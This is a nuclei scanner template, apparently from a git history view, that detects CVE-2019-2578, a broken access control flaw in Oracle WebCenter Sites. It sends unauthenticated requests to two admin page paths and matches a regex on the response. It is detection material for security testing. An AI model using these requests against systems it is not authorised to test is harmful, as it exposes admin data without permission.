nuclei-templates/cves/2019/CVE-2019-2578.yaml

37 lines
1.2 KiB
YAML
Raw Normal View History

2021-11-06 00:24:41 +00:00
id: CVE-2019-2578
info:
name: Oracle Fusion Middleware WebCenter Sites 12.2.1.3.0 - Broken Access Control
2021-11-06 00:24:41 +00:00
author: leovalcante
severity: high
description: Oracle Fusion Middleware WebCenter Sites 12.2.1.3.0 suffers from broken access control. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebCenter Sites accessible data.
reference:
- https://www.oracle.com/security-alerts/cpuapr2019.html
- https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites
- https://nvd.nist.gov/vuln/detail/CVE-2019-2578
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cve-id: CVE-2019-2578
tags: cve,cve2019,oracle,wcs,auth-bypass
2021-11-06 00:24:41 +00:00
requests:
- raw:
- |
GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1
2021-11-06 08:11:08 +00:00
Host: {{Hostname}}
2021-11-06 00:24:41 +00:00
- |
GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/Slots HTTP/1.1
2021-11-06 08:11:08 +00:00
Host: {{Hostname}}
stop-at-first-match: true
2021-11-06 00:24:41 +00:00
matchers:
- type: regex
part: body
2021-11-06 08:11:08 +00:00
regex:
- '<script[\d\D]*<throwexception/>'
# Enhanced by mp on 2022/05/04